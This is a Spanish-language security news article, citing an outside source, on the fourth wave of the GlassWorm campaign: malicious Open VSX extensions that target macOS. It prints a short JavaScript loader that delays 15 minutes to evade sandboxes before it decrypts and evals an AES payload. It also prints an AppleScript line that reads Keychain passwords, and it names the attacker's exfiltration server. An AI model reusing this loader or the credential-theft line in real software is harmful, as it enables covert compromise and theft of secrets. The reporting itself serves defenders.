Campañas anteriores dependían de caracteres Unicode invisibles y binarios Rust compilados para ocultar código malicioso. La iteración más reciente abandona estos enfoques en favor de payloads JavaScript encriptados con AES-256-CBC específicamente diseñados para entornos macOS.

  Tres extensiones sospechosas fueron marcadas en el mercado Open VSX: pro-svelte-extension, vsce-prettier-pro, y full-access-catppuccin-pro-extension, todas conectadas a través de una infraestructura compartida y claves de encriptación. El malware emplea una infraestructura de comando y control basada en la cadena de bloques Solana que hace que los esfuerzos de eliminación sean casi imposibles. Al publicar memos de transacción que contienen URL codificadas en base64 en la cadena de bloques, el atacante mantiene un control descentralizado que no puede ser interrumpido a través del bloqueo tradicional de dominios. Los investigadores rastrearon la infraestructura a la dirección IP 45.32.151.157, que también se utilizó en la tercera ola, confirmando la continuidad del actor de la amenaza. Los analistas de Koi identificaron el malware a través del análisis de comportamiento después de que su motor de riesgo detectó patrones inusuales en el comportamiento de la extensión y las comunicaciones de red.

Payload Encriptado y Tácticas de Evasión de Sandbox

La cuarta ola introduce un ingenioso mecanismo de temporización diseñado para evadir el análisis de seguridad automatizado. Una vez instalado, la extensión maliciosa espera exactamente 15 minutos antes de ejecutar su payload. Este retraso es crítico porque la mayoría de los entornos sandbox se agotan después de 5 minutos, lo que significa que el malware aparece completamente benigno durante el escaneo automatizado. El código contiene un valor codificado de 9e5 milisegundos (900.000 milisegundos equivalen a 15 minutos), que desencadena la desencriptación y ejecución del payload encriptado con AES-256-CBC.

setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);

El payload en sí está incrustado en la línea 64 del archivo principal de la extensión, encriptado con una clave y un vector de inicialización codificados que permanecen consistentes en las tres extensiones maliciosas. Esta infraestructura criptográfica compartida confirma que un único actor de la amenaza es responsable de la campaña. Después de que expira el período de retraso, el malware recupera el endpoint actual de comando y control de la cadena de bloques Solana y ejecuta cualquier instrucción que reciba. El payload específico de macOS incluye AppleScript para la ejecución sigilosa, LaunchAgents para la persistencia en lugar de las claves del Registro de Windows, y acceso directo a la base de datos de Keychain de macOS para recuperar contraseñas y credenciales almacenadas.

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

El malware también incluye la capacidad de reemplazar las aplicaciones de billeteras de hardware con versiones trojanizadas, apuntando tanto a Ledger Live como a Trezor Suite. Si bien la funcionalidad de reemplazo de billetera no estaba completamente activa durante las pruebas el 29 de diciembre de 2025, la infraestructura del código está completa y a la espera de cargas útiles. El malware valida que los archivos descargados superen los 1000 bytes antes de la instalación, evitando instalaciones rotas que puedan alertar a las víctimas. Todos los datos robados se almacenan en el directorio temporal /tmp/ijewf/, se comprimen y se envían al servidor de exfiltración en 45.32.150.251/p2p para su recuperación por parte del atacante.

Fuentes:
https://cybersecuritynews.com/self-propagating-glassworm-weaponizing-vs-code/